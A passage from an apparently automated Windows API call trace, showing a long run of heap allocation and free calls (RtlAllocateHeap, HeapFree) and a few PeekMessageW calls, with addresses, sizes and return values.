Flags=0x0, Size=0x830) returned 0x3b15070 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0201.426] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.426] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) 